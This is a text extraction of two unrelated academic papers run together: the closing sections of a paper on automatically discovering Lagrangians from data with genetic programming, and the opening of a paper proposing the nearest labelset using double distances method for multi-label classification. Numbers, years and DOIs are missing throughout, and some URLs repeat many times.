ability to generalise that sets a true physical model apart from a mere fit or interpolation of the system’s behaviour. it is interesting, therefore, to study whether the models found by our algorithm have this property. we have seen in the case of the duffing oscillator that the discovered model is indeed the correct model, and we would expect that this model will correctly predict the dynamics of the system for any initial conditions. we test this by simulating the behaviour of the system for a wide range of initial conditions, and comparing the results to the predictions of the model. we find, as expected, that the learned model for the duffing oscillator does make correct predictions for all initial conditions. applying this procedure to the other test systems we find that the coupled harmonic oscillators and the penning-type ion trap models also generalise well, making successful predictions for all initial conditions. this indicates that our algorithm is not merely a hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure predictions for different initial conditions of the learned simple pendulum model (red dashed line) compared to the true behaviour (blue solid line). the amplitude of the pendulum swing varies between panels. the model was trained at the amplitude shown in (f). we see that the model makes good predictions for the initial conditions it was trained on, but breaks down for other initial conditions. sophisticated curve fitting routine, but rather is finding the underlying physical truth behind the system dynamics to make its predictions. the pendulum and double pendulum models do not generalise well, as we might have anticipated from the form of the lagrangian in eq. ( ). figure compares the prediction of the learned simple pendulum model against the true behaviour, for a variety of swing amplitudes. we see that while the prediction is accurate for the amplitude at which the model was trained, it deviates at other amplitudes. these results are perhaps to be expected, and could well be the same as generated by a human physicist given the same data. the algorithm has found a mathematically simple approximation that works well for the data it has available to it, but does not have enough to go on to determine the true underlying model. we consider two approaches to generating models that generalise better for these systems, inspired by the approaches a human physicist might take. the first method is simply to train the models with more data, corresponding to a wider range of initial conditions. the second is to introduce new mathematical constructs which allow a simpler model to be found, reasoning that this model is more likely to generalise well. for the first approach we follow exactly the same procedure as before except we generate a number of trajectories, corresponding to a range of initial conditions, and use a score that is the sum of the scores for the individual trajectories. we applied this procedure to the simple pendulum system. the resulting search takes approximately times longer to converge than the single-trajectory search. we find that the algorithm is unable to converge on an m = , p = model, as it did before, and has to continue its search until it finds an m = , p = model whose predictions fit all of the trajectories adequately. figure compares the predictive ability of this model with the ‘single-trajectory’ model of the previous section. we see that, as shown in fig. , the single-trajectory model makes hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparing a model for the simple pendulum trained on multiple trajectories with one trained on a single trajectory. the curves show the squared error between the model’s prediction and the true behaviour, as a function of the pendulum’s swing amplitude. the dashed (blue) curve shows the result for a model trained at a single swing amplitude, indicated by the heavy (blue) arrow. this model performs well at the amplitude it was trained at, but poorly at other amplitudes. the model corresponding to the solid (red) curve was trained with multiple trajectories, indicated by the other (red) arrows. the original trajectory was also included in the training set for this model. we see that the ‘multi-trajectory’ model makes better predictions across a wide range of initial conditions, including conditions that it was not trained on. the multi-trajectory model is able to make successful predictions up to surprisingly large amplitudes, well beyond those it has seen in training. good predictions for the initial condition it was trained at, but makes poor predictions for other initial conditions. the ‘multi-trajectory’ model, though, is much improved. it makes good predictions at all of the initial conditions it was trained at, and further makes good predictions at other, unseen initial conditions as well. we have found similar results for the double-pendulum system, although the computational expense of the problem constrained the experiment to a limited region of initial-condition-space. our second approach to generalisation is to expand the representation of the lagrangians to encompass a wider range of mathematical expressions. we reason that, with a wider palette of mathematics at its disposal, the algorithm may be able to find a model of simpler form that works well. history has shown, although this may be tautological, that often systems of interest to physicists can be described by remarkably simple mathematical models. we hope that by allowing the algorithm to generate structurally simpler models, it may be more likely to discover the underlying physical truth. we have developed a proof-of-principle implementation of a richer representation, and a corresponding search algorithm, detailed in the appendix . briefly, we take a genetic programming approach (koza, ) and compose mathematical expressions as trees with leaf-nodes corresponding to the system variables, simple functions (sine, cosine, square) of these variables, and numerical constants. branch-nodes of the tree are arithmetic operators +,−,×. this structure can represent a much wider range of mathematical forms than our polynomial representation. we search over this tree-structured representation using hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. an algorithm (zitzler, laumanns & thiele, ) that simultaneously tries to optimise the score and minimise the size of the trees. thus, this search algorithm tries explicitly to find simple expressions that score well on the data. repeating the search on large-amplitude (± . π ) simple pendulum data using the tree-based representation highlights the relative strength of this approach. the generated model, which makes a successful prediction, is l = . θ̇ + . cos(θ ), the same as would be written by a human physicist. naturally, this model makes correct predictions over the full range of initial conditions. there are two reasons that the tree-based expression search is able to converge on this model. first it is only because the representation of possible models is richer that this model can be directly represented at all. second, the notion of mathematical complexity in this representation more closely models that of a human physicist. this allows the search algorithm to do more work driving the result towards an expression that we recognize as canonical. it must be cautioned, though, that this is only a proof-of-principle demonstration. to reach this result we had to bias the search algorithm, as described in the appendix , and even then the run time is significantly longer, often taking many hours with a multi-threaded implementation on the hardware described above. we were not able to get results for the double pendulum system at all with the computing resources at our disposal. nonetheless, we present this result as the technique shows potential for learning models that are both better able to generalise, and in a format more suitable for communication to human physicists. conclusion we have demonstrated an algorithm that can predict the future dynamics of a physical system directly from observed data. we have shown that the algorithm generates models that can be communicated to a human physicist, sometimes even finding models in textbook form. we have further shown that the models generated generalise well to unseen data, and are not merely fits or interpolations, but are truly capturing the physical essence of the system under study. one might ask what the use of such an algorithm is. as a first point, we find the question of whether a computer can do science to be fascinating in itself. investigating the limits of a computer’s ability in this regard educates us as to the strengths and weaknesses of our current scientific processes, and invites us to consider a different perspective on our scientific work. but perhaps a more practical answer is that tools such as this could assist humans in their work. we see this assistance as coming in two forms. the first is simply automating the actions of a scientist so they can be applied to more data. techniques that can be automatically applied to datasets, scanning for scientifically interesting features—in the case of the algorithm in this paper, for example, finding that there is a least action principle at work—may come to be a fruitful approach to generating unexpected scientific leads as we head into a data-dominated era. the second is opening up the techniques of science to hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure an expression tree representing θ − cos(θ̇ ). non-specialists. by capturing the idea of searching for least action models in an algorithm we make it available to anyone, including those without the necessary skills to do it by hand. by way of analogy, it is interesting to consider popular online natural language translation software. while no-one would consider these tools suitable for translating poetry, they nonetheless are exceedingly useful to many people in the common case where a ‘good-enough’ translation will do. while we do not imagine computers will replace expert human physicists in the near term, we envisage the availability of tools to automate scientific reasoning will empower non-specialists to take better advantage of the discoveries and insights of physics. acknowledgements we acknowledge many useful discussions with jeremy mabbitt, mike tarbutt, jack devlin, iain barr, ben sauer, and ed hinds. djah and amg contributed equally to this work. appendix: tree-based representation and search here we describe in detail the tree-structured symbolic representation of mathematical expressions and the corresponding search routine. the expressions are built following a grammar designed to bias the search towards expressions that might be lagrangians for simple physical systems. each terminal of these expression trees is one of: numerical constants, randomly generated; the coordinate variables and velocities; the squares of the coordinates and velocities; and for coordinates which represent angles, the sine and cosine of the coordinates and velocities. the non-terminal nodes of the trees are the operators +,−,×. an example expression tree is shown in fig. , representing the expression θ − cos(θ̇ ). to search through these tree-structured expressions we take a genetic programming approach (koza, ), explicitly optimising both the least-action score eq. ( ) and also a complexity score, using the spea multi-objective optimisation algorithm (zitzler, laumanns & thiele, ). this biologically-inspired evolutionary algorithm maintains a population of candidate expressions and breeds, reproduces, and mutates them to try to simultaneously optimise the least-action and complexity scores. hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in detail, we first construct a population of randomly generated expressions, usually numbering . we score these expressions using the least-action score and also assign a complexity score which is simply the number of nodes in the expression tree. the spea algorithm takes the current population, and an initially empty set of elite expressions, representing the best that have been seen so far. it has a rather complex selection mechanism (zitzler, laumanns & thiele, ) that produces a new set of elite expressions, plus a set of expressions, the breeding pool, which are candidates for reproduction. a new generation is created from the breeding pool by mutation ( %) and pair-wise crossover ( %). mutation is effected by replacing a randomly chosen subtree of the given expression with a randomly generated subtree. the crossover operation takes two expressions, selects a random point in each of the two trees, and swaps the sub-trees at these points to generate two new expressions. the evolutionary process is repeated starting from this new generation, and we iterate for a large number of generations, typically many thousand. to improve the convergence speed of the numeric constants in the expressions we also incorporate a small amount of hill-descent into each evolutionary iteration: a subset ( %) of the expressions have their numeric constants randomly adjusted by a small amount, and if this improves their least-action score, the modification is kept. we also impose a maximum size of expression ( nodes) and trim expressions that exceed it each generation to ensure that the run-time is bounded. the final elite set is a set of expressions that represent the trade-off between least-action score and complexity. we select from this set the simplest expression that has a least-action error below a specified threshold. in this tree-based method, the structure of the candidate lagrangians varies during the search, so it is not possible to partially pre-calculate the score function, as it was in the restricted polynomial technique. rather it must be calculated in full for each expression in the population. further, the search space of possible expressions is exceedingly large, and the score is not very smooth with respect to the genetic operations. as a result, the search must run for many generations and is extremely computationally expensive. a naı̈ve implementation might calculate the partial derivative time-series in (eq. ( )) by symbolically differentiating the candidate expression and then calculating the value of the derivative. this, however, can be exponentially expensive in the depth of the expression, in terms of both memory and runtime. a better approach, that we adopt in this work, is to simultaneously evaluate the expression’s value and its derivatives using automatic differentiation (kalman, ). this method avoids calculating an expression for the derivative, and has run-time proportional to the size of the expression. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. author contributions • daniel j.a. hills and adrian m. grütter performed the experiments, analyzed the data, performed the computation work, reviewed drafts of the paper. • jonathan j. hudson conceived and designed the experiments, performed the experi- ments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: https://github.com/jonyepsilon/flow. references atlas collaboration. . observation of a new particle in the search for the standard model higgs boson with the atlas detector at the lhc. physics letters b : doi . /j.physletb. . . . bradley e, easley m, stolle r. . reasoning about nonlinear system identification. artificial intelligence : doi . /s - ( ) - . clegg j, dawson j, porter s, barley m. . the use of a genetic algorithm to optimize the functional form of a multi-dimensional polynomial fit to experimental data. the ieee congress on evolutionary computation : – doi . /cec. . . dzeroski s, todorovski l. . discovering dynamics. in: proc. tenth international conference on machine learning. san mateo: morgan kaufmann publishers inc., – . euler l. . methodus inveniendi lineas curvas maximi minive proprietate gaudentes. in: methodus inveniendi lineas curvas maximi minive proprietate gaudentes. bousquet, lausanne & geneva. feynman r, leighton r, sands m. . the feynman lectures on physics. in: the feynman lectures on physics. nd edition. vol. . boston: addison-wesley. gao f, han l. . implementing the nelder-mead simplex algorithm with adaptive parameters. computational optimization and applications : doi . /s - - - . hayden ec. . is the $ , genome for real? nature doi . /nature. . . hillar c, sommer f. . comment on the article “distilling free-form natural laws from experimental data”. arxiv preprint. arxiv: . . hudson jj, hills dja, grütter am. flow project code. available at https://github.com/jonyepsilon/ flow. kalman d. . doubly recursive multivariate automatic differentiation. mathematics magazine : doi . / . koza jr. . genetic programming: on the programming of computers by means of natural selection. cambridge: mit press. langley p. . rediscovering physics with bacon. . in: proceedings of the th international joint conference on artificial intelligence. vol. . san francisco: morgan kaufmann publishers inc., – series and number ijcai’ . ljung l. . perspectives on system identification. annual reviews in control ( ): – doi . /j.arcontrol. . . . hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow http://dx.doi.org/ . /j.physletb. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /cec. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /nature. . http://arxiv.org/abs/ . https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow https://github.com/jonyepsilon/flow http://dx.doi.org/ . / http://dx.doi.org/ . /j.arcontrol. . . http://dx.doi.org/ . /peerj-cs. maupertuis plm de. . accord de différentes lois de la nature qui avaient jusqu’ici paru incompatibles. mém. as. sc. paris . nelder ja, mead r. . a simplex method for function minimization. the computer journal ( ): – doi . /comjnl/ . . . newman r, tseng j. memo : cloud computing and the square kilometre array. available at http://www.skatelescope.org/uploaded/ memo newman.pdf. schmidt m, lipson h. . distilling free-form natural laws from experimental data. science ( ): – doi . /science. . schmidt m, lipson h. . symbolic regression of implicit equations. in: riolo r, o’reilly u-m, mcconaghy t, eds. genetic programming theory and practice vii, genetic and evolutionary computation, genetic and evolutionary computation. springer, – . sjöberg j, zhang q, ljung l, benveniste a, delyon b, glorennec p-y, hjalmarsson h, judit- sky a. . nonlinear black-box modeling in system identification: a unified overview. trends in system identification, automatica ( ): – doi . / - ( ) - . todorovski l, dzeroski s. . declarative bias in equation discovery. in: proc. fourteenth international conference on machine learning. san mateo: morgan kaufmann publishers inc., – . zitzler e, laumanns m, thiele l. . giannakoglou k, et al., ed. evolutionary methods for design, optimisation and control with application to industrial problems (eurogen). international center for numerical methods in engineering (cimne), – . hills et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /comjnl/ . . http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf http://dx.doi.org/ . /science. http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /peerj-cs. an algorithm for discovering lagrangians automatically from data introduction the principle of least action the algorithm score function representation and search results generalisation conclusion acknowledgements appendix: tree-based representation and search references submitted august accepted november published december corresponding author hyukjun gweon, hgweon@uwo.ca academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright gweon et al. distributed under creative commons cc-by . open access nearest labelset using double distances for multi-label classification hyukjun gweon , matthias schonlau and stefan h. steiner department of statistical and actuarial sciences, university of western ontario, london, ontario, canada department of statistics and actuarial science, university of waterloo, waterloo, ontario, canada abstract multi-label classification is a type of supervised learning where an instance may belong to multiple labels simultaneously. predicting each label independently has been criticized for not exploiting any correlation between labels. in this article we propose a novel approach, nearest labelset using double distances (nldd), that predicts the labelset observed in the training data that minimizes a weighted sum of the distances in both the feature space and the label space to the new instance. the weights specify the relative tradeoff between the two distances. the weights are estimated from a binomial regression of the number of misclassified labels as a function of the two distances. model parameters are estimated by maximum likelihood. nldd only considers labelsets observed in the training data, thus implicitly taking into account label dependencies. experiments on benchmark multi-label data sets show that the proposed method on average outperforms other well-known approaches in terms of / loss, and multi- label accuracy and ranks second on the f-measure (after a method called ecc) and on hamming loss (after a method called rf-pct). subjects data mining and machine learning, data science keywords multi-label classification, label correlations, nearest neighbor introduction in multi-label classification, an instance can belong to multiple labels at the same time. this is different from multi-class or binary classification, where an instance can only be associated with a single label. for example, a newspaper article talking about electronic books may be labelled with multiple topics such as business, arts and technology simultaneously. multi- label classification has been applied in many areas of application including text (schapire & singer, ; godbole & sarawagi, ), image (boutell et al., ; zhang & zhou, ), music (li & ogihara, ; trohidis et al., ) and bioinformatics (elisseeff & weston, ). a labelset for an instance is the set of all labels that are associated with that instance. approaches for solving multi-label classification problems may be categorized into either problem transformation methods or algorithm adaptation methods (tsoumakas & katakis, ). problem transformation methods transform a multi-label problem into one or more single-label problems. for the single-label classification problems, binary or multi-class classifiers are used. the results are combined and transformed back into a multi-label representation. algorithm adaptation methods, on the other hand, modify specific learning algorithms directly for multi-label problems. tsoumakas, katakis how to cite this article gweon h, schonlau m, steiner sh. . nearest labelset using double distances for multi-label classification. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:hgweon@uwo.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. & vlahavas ( ), madjarov et al. ( ) and zhang & zhou ( ) give overviews of multi-label algorithms and evaluation metrics. in this article, we propose a new problem transformation approach to multi-label classification. our proposed approach applies the nearest neighbor method to predict the label with the shortest distance in the feature space. however, because we have multiple labels, we additionally consider the shortest (euclidean) distance in the label space where the input of the test instance in the label space consists of probability outputs obtained by independent binary classifiers. we then find the labelset that minimizes the expected label misclassification rate as a function of both feature space and label space distances, thus exploiting high-order interdependencies between labels. the nonlinear function is estimated using maximum likelihood. the effectiveness of the proposed approach is evaluated with various multi-label data sets. our experiments show that the proposed method performs on average better on standard evaluation metrics (hammming loss, / loss, multi-label accuracy and the f-measure) than other commonly used algorithms. the rest of this article is organized as follows: in ‘related work’ we review previous work on multi-label classification. in ‘the nearest labelset using double distances approach’, we present the details of the proposed method. in ‘experimental evaluation’, we report on experiments that compare the proposed method with other algorithms on standard metrics. in ‘discussion’ we discuss the results. in ‘conclusion’, we draw conclusions. related work in this section, we briefly review the multi-label approaches that are existing competitors to the proposed method. there are several approaches to classifying multi-label data. the most common approach, binary relevance (br) (zhang & zhou, ; tsoumakas & katakis, ), transforms a multi-label problem into separate binary problems. that is, using training data, br constructs a binary classifier for each label independently. for a test instance, the prediction set of labels is obtained simply by combining the individual binary results. in other words, the predicted labelset is the union of the results predicted from the l binary models. this approach requires one binary model for each label. the method has been adapted in many domains including text (gonçalves & quaresma, ), music (li & ogihara, ) and images (boutell et al., ). one drawback of the basic binary approach is that it does not account for any correlation that may exist between labels, because the labels are modelled independently. taking correlations into account is often critical for prediction in multi-label problems (godbole & sarawagi, ; ji et al., ). subset-mapping (smbr) (schapire & singer, ; read et al., ) is a method related to br. for a new instance, first labels are predicted by the binary outputs of br. then, final prediction is made by the training labelset with the shortest hamming distance to the predicted labelset. smbr makes predictions by selecting labelsets observed in the training data. sbmr is a nearest neighbor approach in the label space—from the set of predicted labels to the sets of labels observed in the training data—with hamming distance as the distance metric. gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. an extension of binary relevance is classifier chain (cc) (read et al., ). cc fits labels sequentially using binary classifiers. labels already predicted are included as features in subsequent classifiers until all labels have been fit. including previous predictions as features ‘‘chains’’ the classifiers together and also takes into account potential label correlations. however, the order of the labels in a chain affects the predictive performances. read et al. ( ) also introduced the ensemble of classifier chains (ecc), where multiple cc are built with re-sampled training sets. the order of the labels in each cc is randomly chosen. the prediction label of an ecc is obtained by the majority vote of the cc models. label powerset learning (lp) transforms a multi-label classification into a multi- class problem (tsoumakas & katakis, ). in other words, lp treats each labelset as a single label. the transformed problem requires a single classifier. although lp captures correlations between labels, the number of classes in the transformed problem increases exponentially with the number of original labels. lp learning can only choose observed labelsets for predictions (tsoumakas & katakis, ; read, pfahringer & holmes, ). the random k-labelsets method, (rakel) (tsoumakas & vlahavas, ), is a variation on the lp approach. in a multi-label problem with l different labels, rakel employs m multi-class models each of which considers k(≤l) randomly chosen labels, rather than the entire labelset. for a test instance, the prediction labelset is obtained by the majority vote of the results based on the m models. rakel overcomes the problem that the number of multinomial classes increases exponentially as a function of the number of labels. it also considers interdependencies between labels by using multi-class models with subsets of the labels. a hierarchy of multi-label classifiers (homer) (tsoumakas, katakis & vlahavas, ) constructs a tree-shaped hierarchy by partitioning the labels recursively into smaller disjoint subsets (i.e., nodes) using a balanced clustering algorithm, which extends the k means algorithm with an additional constraint on the size of each cluster. after that, homer constructs a multi-label classifier for the labelsets in each node. for the prediction of a new instance, homer follows a top-down recursive process from the root. a classifier on a non-root node is called only if the prediction of its parent node is positive. the final labelset is determined by the positive leaves (i.e., labels) whose parent nodes are all positive. a popular lazy learning algorithm based on the k nearest neighbours (knn) approach is mlknn (zhang & zhou, ). like other knn-based methods, mlknn identifies the k nearest training instances in the feature space for a test instance. then for each label, mlknn estimates the prior and likelihood for the number of neighbours associated with the label. using bayes theorem, mlknn calculates the posterior probability from which a prediction is made. the conditional bernoulli mixtures (cbm) (li et al., ) approach transforms a multi-label problem into a mixture of binary and multi-class problems. cbm divides the feature space into k regions and learns a multi-class classifier for the regional components as well as binary classifiers in each region. the posterior probability for a labelset is obtained by mixing the multi-class and multiple binary classifiers. the model parameters are estimated using the expectation maximization algorithm. gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ( , , ) ( , , ) ( , , ) ( , , ) y y y 𝑝 𝑦( ) 𝐷y 𝐷y 𝑦 ( ) 𝐷y figure an illustration of the label space when l = . each vertex represents a labelset. the inner point represents a fitted vector of an instance. dyi represents the distance between p̂ and yi. full-size doi: . /peerjcs. /fig- multi-target classification approaches may also be used for multi-label classification. a number of multi-target learning methods use the predictive clustering tree (pct) (blockeel, raedt & ramon, ) as the base classifier. random forest of predictive clustering trees (rf- pct) (kocev et al., ) has been shown to be competitive (madjarov et al., ). rf-pct is a tree-based ensemble method using pcts as base classifiers. different pcts are constructed from different bootstrap samples and random subsets of the features. the nearest labelset using double distances approach hypercube view of a multi-label problem in multi-label classification, we are given a set of possible output labels l={ , ,...,l}. each instance with a feature vector x∈rd is associated with a subset of these labels. equivalently, the subset can be described as y=(y( ),y( ),...,y(l)), where y(i) = if label i is associated with the instance and y(i) = otherwise. a multi-label training data set is described as t ={(xi,yi)},i= ,{ ,...,n}. any labelset y can be described as a vertex in the l-dimensional unit hypercube (tai & lin, ). each component y(i) of y represents an axis of the hypercube. as an example, fig. illustrates the label space of a multi-label problem with three labels (y( ), y( ), y( )). assume that the presence or absence of each label is modeled independently with a probabilistic classifier. for a new instance, the classifiers provide the probabilities, p( ), ..., p(l), that the corresponding labels are associated with the instance. using the probability outputs, we may obtain a l-dimensional vector p̂=(p( ),p( ),...,p(l)). every element of p̂ has a value from to and the vector p̂ is an inner point in the hypercube (see fig. ). gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. given p̂ the prediction task is completed by assigning the inner point to a vertex of the cube. for the new instance, we may calculate the euclidean distance, dyi, between p̂ and each yi (i.e., the labelset of the ith training instance). in fig. , three training instances y , y and y and the corresponding distances are shown. a small distance dyi indicates that yi is likely to be the labelset for the new instance. nearest labelset using double distances (nldd) in addition to computing the distance in the label space, dyi, we may also obtain the (euclidean) distance in the feature space, denoted by dxi. the proposed method, nldd, uses both dx and dy as predictors to find a training labelset that minimizes the expected loss. for each test instance, we define loss as the number of misclassified labels out of l labels. the expected loss is then lθ where θ =g(dx,dy) represents the probability of misclassifying each label. the predicted labelset, ŷ∗, is the labelset observed in the training data that minimizes the expected loss: ŷ∗=argmin y∈t lg(dx,dy) ( ) the loss follows a binomial distribution with l trials and a parameter θ. we model θ=g(dx,dy) using binomial regression. specifically, log ( θ −θ ) =β +β dx+β dy ( ) where β , β and β are the model parameters. greater values for β and β imply that θ becomes more sensitive to the distances in the feature and label spaces, respectively. the misclassification probability decreases as dx and dy approach zero. a test instance with dx=dy= has a duplicate instance in the training data (i.e., with identical features). the predicted probabilities for the test instance are either or and the match the labels of the duplicate training observation. for such a ‘‘double’’-duplicate instance (i.e., dx =dy = ), the probability of misclassification is /( +e−β ) > . as expected, the uncertainty of a test observation with a ‘‘double-duplicate’’ training observation is greater than zero. this is not surprising: duplicate training observations do not necessarily have the same response, and neither do double-duplicate observations. the model in eq. ( ) implies g(dx,dy)= /( +e−(β +β dx+β dy)). because log ( θ −θ ) is a monotone transformation of θ and l is a constant, the minimization problem in ( ) is equivalent to ŷ∗=argmin (x,y)∈t β dx+β dy ( ) that is, nldd predicts by choosing the labelset of the training instance that minimizes the weighted sum of the distances. for prediction, the only remaining issue is how to estimate the weights. estimating the relative weights of the two distances the weights β ,β and β can be estimated using binomial regression. binomial regression can be fit by running separate logistic regressions, one for each of the l labels. to run gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the dataset is split equally for training and testing. an unequal split is not desirable: adding more instances to the internal training set may improve the performance of individual probabilistic classifiers. however, this would lead to the decrease of the number of distance pairs that are needed for the binomial regression modeling (# distance pairs = (# instance in the internal validation set)). that is, reducing the size of the validation set will decrease the amount of data used for binomial regression. algorithm the training process of nldd input: training data t , number of labels l output: probabilistic classifiers h(i), binomial regression g split t into t and t for i= to l do train probabilistic classifier h(i) based on t train probabilistic classifier h(i)∗ based on t end for s,w ←∅ for each instance in t do obtain p̂=(h( )∗ (x),...,h (l) ∗ (x)) for each instance in t do compute dx and dy w ←w ∪(dx,dy) end for find m ,m ∈w update s←s∪{m ,m } end for fit log ( θ −θ ) =β +β dx+β dy to s obtain g :s→ θ̂= e f̂ +e f̂ where f̂ = β̂ +β̂ dx+β̂ dy algorithm the classification process of nldd 